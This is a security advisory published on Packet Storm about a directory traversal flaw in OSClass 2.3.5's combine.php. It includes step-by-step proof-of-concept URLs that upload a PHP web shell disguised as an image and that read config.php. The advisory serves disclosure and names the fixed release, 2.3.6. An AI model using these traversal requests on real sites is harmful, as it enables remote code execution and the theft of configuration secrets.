exploit the possibilities

OSClass 2.3.5 Directory Traversal

OSClass 2.3.5 Directory Traversal
Posted Mar 8, 2012
Authored by Filippo Cavallarin

OSClass versions 2.3.5 and below suffer from a directory traversal vulnerability.

tags | exploit
MD5 | f829273ebc8e11ba1061dadaf7374284

OSClass 2.3.5 Directory Traversal

Change Mirror Download
Advisory ID:  CSA-12004
Title: OSClass directory traversal vulnerability
Product: OSClass
Version: 2.3.5 and probably prior
Vendor: osclass.org
Vulnerability type: Directory traversal
Risk level: 2 / 3
Credit: www.codseq.it
Vendor notification: 2012-01-25
Public disclosure: 2012-03-07
Original advisory: http://www.codseq.it/advisories/osclass_directory_traversal_vulnerability


OSClass version 2.3.5 and probably below suffers from a directory traversal vulnerability that leads to arbitrary file upload and information disclosure.

The problem is in the modified version of combine.php.
combine.php is used to merge multiple files into one to speed up page loading and implements a cache for generated files.
It takes two get parameters: "files" which is a list of files to merge and "type" that specifies the type of returned file; as a security measure combine.php ensures that the requested files are in its same directory (including subdirs).

combine.php fails to sanityze "type" get parameter before passing it to fwrite/fread calls. This allows an attacker to specify an arbitrary cache dir.



1) Arbitrary file upload. If a user can publish items and OSClass is configured to preserve a copy of the original image (default) it is possible to put an arbitrary file (ie a malicious php script) under the www root so shell commands can be executed with the privileges of the webserver.

Proof of concept:

1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type)

2. Upload that file as picture for a new item and get its name (is 5_small.jpg)

3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php)

4. Use combine.php to move itself to oc-content/uploads
http://127.0.0.1/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php

now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded)

5. Use uploads/combine.php to move 5_original.php to /remote.php
http://127.0.0.1/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php

6. Run the uploaded php file
http://127.0.0.1/osclass/remote.php



2) Information disclosure vulnerability. It is possible to download and arbitrary file (ie config.php) under the www root.

1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding)

2. Move combine.php into web root
http://127.0.0.1/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php

3. Run combine to download config.php
http://127.0.0.1/osclass/combine.php?files=config.php

Solution

upgrade to OSClass 2.3.6

http://osclass.org/2012/03/05/osclass-2-3-6/



Filippo Cavallarin


C o d S e q
Development with an eye on security
------------------------------------------------------------------------
Castello 2005, 30122 Venezia
Tel: 041 88 761 58 - Fax: 041 81 064 714 - Cell: 346 66 93 254
c.f. CVLFPP82B27L736J - p.iva 03737650279
http://www.codseq.it - filippo.cavallarin@codseq.it

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close